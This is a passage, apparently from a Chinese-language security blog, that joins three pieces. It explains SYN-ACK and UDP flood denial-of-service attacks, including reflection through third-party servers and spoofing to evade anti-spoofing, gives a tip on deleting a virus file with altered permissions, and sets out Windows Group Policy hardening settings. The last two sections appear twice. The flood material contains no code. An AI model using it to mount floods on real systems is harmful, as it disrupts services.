SYN-ACK洪水的作用基礎是令CPU資源枯竭。從理論上講,這種信息包是 TCP 3 向握手的第二步,而且在 TCB 中應該有對應的入口。瀏覽 TCB 將會使用 CPU 資源,尤其 TCB 很大時會耗用更多的 CPU 資源。因此,負荷較重時,這種對資源的使用會影響系統性能。
這也就是SYN-ACK攻擊所仰仗的利器。向系統發送一個巨荷的SYN-ACK 信息包會顯著增加系統 CPU 的使用率。因此,用于組織 TCB 的哈希算法和哈希表大小之選擇會影響攻擊的效率(請參閱“概念”和“邏輯缺陷”)。而且,因為這些 SYN-ACK 信息包不屬于現有的連接,所以目標機器不得不將 RST 信息包發送到源機器,從而增加了鏈路上的帶寬占用率。對于 SYN 洪水,攻擊者為了避免接收到 RST,當然可以偽造源機器的 IP 地址,這樣還可以提高攻擊者的可用帶寬。
這也只需要一條簡單的命令就可以進行這種攻擊。
一個重要因子是由第三方服務器基于反射機制而生成SYN-ACK信息包的能力。在將SYN 信息包發送到服務器的開放端口時,該服務器將 SYN-ACK 信息包發送回源機器。此時任何服務器都可能為這種攻擊充當中繼。發送到服務器的簡單 SYN 信息包帶有偽造的源,其發送到目標時生成 SYN-ACK 返回目標。這種技術讓跟蹤更加困難。而且,在某些情況下,還可以繞過某些防偽機制。尤其當目標和攻擊者屬于同一干道而且部署的 uRPF (參閱“防偽”) 距離目標機器和攻擊者足夠遠時,更有可能避開防偽機制。
通過與SYN洪水聯結還可以提高此種攻擊的強度。SYN洪水在TCB 中創建入口,而TCB因此變得越來越大。由于此時瀏覽 TCB 所需的時間更長,所以 SYN-ACK 洪水的功效大大增加。
UDP洪水
UDP同樣天生就是拒絕服務攻擊的傳播媒介。按照指定,在封閉端口上接收UDP信息包的服務器將無法到達 ICMP 端口的信息包發送回給源機器。ICMP 信息包的數據部分填充有原始 UDP 信息包中的至少前 64 個字節。因為沒有標準限度或額度,所以很可能在封閉的端口上發送巨量的信息包。在為生成 ICMP 而進行負荷極大的必需操作時,,錯誤的信息包消耗了大量 CPU 資源,最終導致CPU 資源枯竭。
同樣,也可以從命令行生成這種攻擊。而且,也可以通過偽造而使得ICMP信息包不會降低攻擊者的帶寬。
保護系統技巧 處理另類無法刪除病毒
[ 2007-03-25 03:57:17 | 作者: sun ]
隨著不限時寬帶的普及,為了方便BT下載,很多朋友都愛24小時掛機。全天候的在線,這給一些病毒、木馬“入侵”系統帶來了極大便利,他們可以在半夜入侵我們的電腦,肆意為非作歹。近日筆者在幫助一位朋友殺毒的時候,就遭遇一個“無法刪除的病毒”,下面將查殺經驗與大家共享。
1.驚現病毒。朋友的電腦安裝的是Windows XP專業版,近來常常徹夜開機用BT下載電影,沒想到在一次開機的時候,Norton就報告在下發現病毒“exporer.exe”,不過使用Norton掃描后,雖然可以發現病毒,但Norton提示無法隔離和刪除病毒文件。
2.查殺。一般來說,病毒如果無法被直接刪除,大多是由于病毒進程在運行導致的,打開任務管理器,找到病毒進程“exporer.exe”順利將其終止,按照Norton提供病毒文件路徑,找到病毒文件后,按住Shift鍵右擊選擇“刪除”,奇怪的是系統卻提示無法刪除文件,再次打開任務管理器,我已經確信病毒進程被終止了,而且也不是在寫保護狀態,為什么無法刪除?我試圖把文件夾刪除,但同樣遭到系統拒絕,重啟電腦多次仍然是同樣的結果。
后來筆者在查看“exporer.exe”屬性(看看文件生成日期和大小,以便搜索一下病毒還有沒有同伙)時,意外發現屬性窗口還有一個“安全”標簽,點擊后可以看到在用戶權限列表“特別權限”的拒絕選項被打上小勾,會不會是文件權限不夠導致無法刪除?單擊的“高級”按鈕,在彈出的窗口我看到一個“拒絕刪除”的權限,單擊“編輯”終于看到文件無法刪除的真正原因了,原來當前用戶的刪除權限被施毒者設置為拒絕了,但是卻允許“讀取和運行,取消拒絕的權限后,返回文件屬性窗口,勾選“允許完全控制”,單擊“確定”退出后順利刪除“exporer.exe”。
小提示
文件(夾)屬性“安全”標簽只會在NTFS格式的分區出現,如果看不到此標簽,打開我的電腦,單擊“工具→文件夾選項→查看”,然后在高級設置選項下去除“簡單文件共享(推薦)”前的小勾。
筆者在刪除“exporer.exe” 后試圖刪除文件夾,遭到系統拒絕后,通過查看文件夾的“安全”屬性,同樣可以發現刪除權限(刪除子文件夾及文件、刪除)被拒絕了,同上,取消這個限制后順利把病毒“掃地出門”。對于文件(夾),如果是由于權限原因被拒絕操作,一般將權限設置為“完全控制”即可。
小技巧
(1)權限是可以繼承的,有時候打開某個文件安全屬性標簽后,可能在圖4不會有“拒絕刪除”權限,但是如果它的父文件夾設置了“拒絕刪除子文件夾及文件”,該文件還是無法被刪除的,解決方法是將文件權限設置為完全控制。
(2)文件權限是和文件所有者相關聯的,對于辦公室多帳戶電腦,一些別有用心的人可能還會將木馬和用戶對應起來(以針對電腦操作水平較低帳戶,警惕性不高易于竊取資料),如果發現木馬毒會和對應帳戶關聯,即有些用戶登錄后木馬會運行,而有些則不會(木馬文件權限被設置為禁止讀取和刪除),這時可以用系統管理員身份登錄,強行將木馬文件所有者更改為當前用戶,然后設置為完全控制將木馬刪除。
(3)一點經驗。Windows XP/2000的文件(夾)權限,是系統一項特殊功能,它允許靈活設置不同用戶的不同權限,一些牧馬者通過將病毒程序文件設置為允許“讀取和運行”、拒絕“刪除”,從而實現更好的“自我保護”。由于更改文件權限操作比較復雜,施毒者一般要在宿主機上親自操作,對于喜愛全天候掛機的朋友,安裝一款防護能力較好的防火墻,關閉一些不必要端口,可以有效防止此類病毒的襲擊,如果發現病毒無法刪除,在終止進程情況下,大家一定要看看文件權限是否被更改了。
1.驚現病毒。朋友的電腦安裝的是Windows XP專業版,近來常常徹夜開機用BT下載電影,沒想到在一次開機的時候,Norton就報告在下發現病毒“exporer.exe”,不過使用Norton掃描后,雖然可以發現病毒,但Norton提示無法隔離和刪除病毒文件。
2.查殺。一般來說,病毒如果無法被直接刪除,大多是由于病毒進程在運行導致的,打開任務管理器,找到病毒進程“exporer.exe”順利將其終止,按照Norton提供病毒文件路徑,找到病毒文件后,按住Shift鍵右擊選擇“刪除”,奇怪的是系統卻提示無法刪除文件,再次打開任務管理器,我已經確信病毒進程被終止了,而且也不是在寫保護狀態,為什么無法刪除?我試圖把文件夾刪除,但同樣遭到系統拒絕,重啟電腦多次仍然是同樣的結果。
后來筆者在查看“exporer.exe”屬性(看看文件生成日期和大小,以便搜索一下病毒還有沒有同伙)時,意外發現屬性窗口還有一個“安全”標簽,點擊后可以看到在用戶權限列表“特別權限”的拒絕選項被打上小勾,會不會是文件權限不夠導致無法刪除?單擊的“高級”按鈕,在彈出的窗口我看到一個“拒絕刪除”的權限,單擊“編輯”終于看到文件無法刪除的真正原因了,原來當前用戶的刪除權限被施毒者設置為拒絕了,但是卻允許“讀取和運行,取消拒絕的權限后,返回文件屬性窗口,勾選“允許完全控制”,單擊“確定”退出后順利刪除“exporer.exe”。
小提示
文件(夾)屬性“安全”標簽只會在NTFS格式的分區出現,如果看不到此標簽,打開我的電腦,單擊“工具→文件夾選項→查看”,然后在高級設置選項下去除“簡單文件共享(推薦)”前的小勾。
筆者在刪除“exporer.exe” 后試圖刪除文件夾,遭到系統拒絕后,通過查看文件夾的“安全”屬性,同樣可以發現刪除權限(刪除子文件夾及文件、刪除)被拒絕了,同上,取消這個限制后順利把病毒“掃地出門”。對于文件(夾),如果是由于權限原因被拒絕操作,一般將權限設置為“完全控制”即可。
小技巧
(1)權限是可以繼承的,有時候打開某個文件安全屬性標簽后,可能在圖4不會有“拒絕刪除”權限,但是如果它的父文件夾設置了“拒絕刪除子文件夾及文件”,該文件還是無法被刪除的,解決方法是將文件權限設置為完全控制。
(2)文件權限是和文件所有者相關聯的,對于辦公室多帳戶電腦,一些別有用心的人可能還會將木馬和用戶對應起來(以針對電腦操作水平較低帳戶,警惕性不高易于竊取資料),如果發現木馬毒會和對應帳戶關聯,即有些用戶登錄后木馬會運行,而有些則不會(木馬文件權限被設置為禁止讀取和刪除),這時可以用系統管理員身份登錄,強行將木馬文件所有者更改為當前用戶,然后設置為完全控制將木馬刪除。
(3)一點經驗。Windows XP/2000的文件(夾)權限,是系統一項特殊功能,它允許靈活設置不同用戶的不同權限,一些牧馬者通過將病毒程序文件設置為允許“讀取和運行”、拒絕“刪除”,從而實現更好的“自我保護”。由于更改文件權限操作比較復雜,施毒者一般要在宿主機上親自操作,對于喜愛全天候掛機的朋友,安裝一款防護能力較好的防火墻,關閉一些不必要端口,可以有效防止此類病毒的襲擊,如果發現病毒無法刪除,在終止進程情況下,大家一定要看看文件權限是否被更改了。
安全設置計算機組策略有效阻止黑客攻擊
[ 2007-03-25 03:57:07 | 作者: sun ]
在本篇技術指南中,將概要介紹你如何修改最重要的組策略安全設置。
你可以在采用Windows XP、2000和Server 2003操作系統的本地計算機上使用這些方法,或者在Server 2003和2000中的OU域名級上使用這些方法。為了簡明扼要和提供最新的信息,我準備介紹一下如何設置基于Windows Server 2003的域名。請記住,這些只是你在你的域名中能夠設置的組策略對象中最有可能出現問題的。按照我的觀點,這些設置可以保持或者破壞Windows的安全。而且由于設置的不同,你的進展也不同。因此,我鼓勵你在使用每一個設置之前都進行深入的研究,以確保這些設置能夠兼容你的網絡。如果有可能的話,對這些設置進行試驗(如果你很幸運有一個測試環境的話)。
如果你沒有進行測試,我建議你下載和安裝微軟的組策略管理控制臺(GPMC)來做這些改變。這個程序能夠把組策略管理任務集中到一個單一的界面讓你更全面地查看你的域名。要開始這個編輯流程,你就上載GPMC,擴展你的域名,用鼠標右鍵點擊“缺省域名策略”,然后選擇“編輯”。這樣就裝載了組策略對象編輯器。如果你要以更快的速度或者“次企業級”的方式編輯你的域名組策略對象,你可以在“開始”菜單中運行“gpedit.msc”。
1.確定一個缺省的口令策略,使你的機構設置位于“計算機配置/Windows設置/安全設置/賬號策略/口令策略”之下。
2.為了防止自動口令破解,在“計算機配置/Windows設置/安全設置/賬號策略/賬號關閉策略”中進行如下設置:
·賬號關閉持續時間(確定至少5-10分鐘)
·賬號關閉極限(確定最多允許5至10次非法登錄)
·隨后重新啟動關閉的賬號(確定至少10-15分鐘以后)
3.在“計算機配置/Windows設置/安全設置/本地策略/檢查策略”中啟用如下功能:
·檢查賬號管理
·檢查登錄事件
·檢查策略改變
·檢查權限使用
·檢查系統事件
理想的情況是,你要啟用記錄成功和失敗的登錄。但是,這取決于你要保留什么類型的記錄以及你是否能夠管理這些記錄。Roberta Bragg在這里介紹了一些普通的檢查記錄設置。要記住,啟用每一種類型的記錄都需要你的系統處理器和硬盤提供更多的資源。
4.作為增強Windows安全的最佳做法和為攻擊者設置更多的障礙以減少對Windows的攻擊,你可以在“計算機配置/Windows設置/安全設置/本地策略/安全選項”中進行如下設置:
·賬號:重新命名管理員賬號--不是要求更有效而是增加一個安全層(確定一個新名字)
·賬號:重新命名客戶賬號(確定一個新名字)
·交互式登錄:不要顯示最后一個用戶的名字(設置為啟用)
·交互式登錄:不需要最后一個用戶的名字(設置為關閉)
·交互式登錄: 為企圖登錄的用戶提供一個消息文本(確定為讓用戶閱讀banner text(旗幟文本),內容大致為“這是專用和受控的系統。
如果你濫用本系統,你將受到制裁。--首先讓你的律師運行這個程序)
·交互式登錄: 為企圖登錄的用戶提供的消息題目--在警告!!!后面寫的東西
·網絡接入:不允許SAM賬號和共享目錄(設置為“啟用”)
·網絡接入:將“允許每一個人申請匿名用戶”設置為關閉
·網絡安全:“不得存儲局域網管理員關于下一個口令變化的散列值”設置為“啟用”
·關機:“允許系統在沒有登錄的情況下關閉”設置為“關閉”
·關機:“清除虛擬內存的頁面文件”設置為“啟用”
如果你沒有Windows Server 2003域名控制器,你在這里可以找到有哪些Windows XP本地安全設置的細節,以及這里有哪些詳細的Windows 2000 Server組策略的設置。要了解更多的有關Windows Server 2003組策略的信息,請查看微軟的專門網頁。
你可以在采用Windows XP、2000和Server 2003操作系統的本地計算機上使用這些方法,或者在Server 2003和2000中的OU域名級上使用這些方法。為了簡明扼要和提供最新的信息,我準備介紹一下如何設置基于Windows Server 2003的域名。請記住,這些只是你在你的域名中能夠設置的組策略對象中最有可能出現問題的。按照我的觀點,這些設置可以保持或者破壞Windows的安全。而且由于設置的不同,你的進展也不同。因此,我鼓勵你在使用每一個設置之前都進行深入的研究,以確保這些設置能夠兼容你的網絡。如果有可能的話,對這些設置進行試驗(如果你很幸運有一個測試環境的話)。
如果你沒有進行測試,我建議你下載和安裝微軟的組策略管理控制臺(GPMC)來做這些改變。這個程序能夠把組策略管理任務集中到一個單一的界面讓你更全面地查看你的域名。要開始這個編輯流程,你就上載GPMC,擴展你的域名,用鼠標右鍵點擊“缺省域名策略”,然后選擇“編輯”。這樣就裝載了組策略對象編輯器。如果你要以更快的速度或者“次企業級”的方式編輯你的域名組策略對象,你可以在“開始”菜單中運行“gpedit.msc”。
1.確定一個缺省的口令策略,使你的機構設置位于“計算機配置/Windows設置/安全設置/賬號策略/口令策略”之下。
2.為了防止自動口令破解,在“計算機配置/Windows設置/安全設置/賬號策略/賬號關閉策略”中進行如下設置:
·賬號關閉持續時間(確定至少5-10分鐘)
·賬號關閉極限(確定最多允許5至10次非法登錄)
·隨后重新啟動關閉的賬號(確定至少10-15分鐘以后)
3.在“計算機配置/Windows設置/安全設置/本地策略/檢查策略”中啟用如下功能:
·檢查賬號管理
·檢查登錄事件
·檢查策略改變
·檢查權限使用
·檢查系統事件
理想的情況是,你要啟用記錄成功和失敗的登錄。但是,這取決于你要保留什么類型的記錄以及你是否能夠管理這些記錄。Roberta Bragg在這里介紹了一些普通的檢查記錄設置。要記住,啟用每一種類型的記錄都需要你的系統處理器和硬盤提供更多的資源。
4.作為增強Windows安全的最佳做法和為攻擊者設置更多的障礙以減少對Windows的攻擊,你可以在“計算機配置/Windows設置/安全設置/本地策略/安全選項”中進行如下設置:
·賬號:重新命名管理員賬號--不是要求更有效而是增加一個安全層(確定一個新名字)
·賬號:重新命名客戶賬號(確定一個新名字)
·交互式登錄:不要顯示最后一個用戶的名字(設置為啟用)
·交互式登錄:不需要最后一個用戶的名字(設置為關閉)
·交互式登錄: 為企圖登錄的用戶提供一個消息文本(確定為讓用戶閱讀banner text(旗幟文本),內容大致為“這是專用和受控的系統。
如果你濫用本系統,你將受到制裁。--首先讓你的律師運行這個程序)
·交互式登錄: 為企圖登錄的用戶提供的消息題目--在警告!!!后面寫的東西
·網絡接入:不允許SAM賬號和共享目錄(設置為“啟用”)
·網絡接入:將“允許每一個人申請匿名用戶”設置為關閉
·網絡安全:“不得存儲局域網管理員關于下一個口令變化的散列值”設置為“啟用”
·關機:“允許系統在沒有登錄的情況下關閉”設置為“關閉”
·關機:“清除虛擬內存的頁面文件”設置為“啟用”
如果你沒有Windows Server 2003域名控制器,你在這里可以找到有哪些Windows XP本地安全設置的細節,以及這里有哪些詳細的Windows 2000 Server組策略的設置。要了解更多的有關Windows Server 2003組策略的信息,請查看微軟的專門網頁。
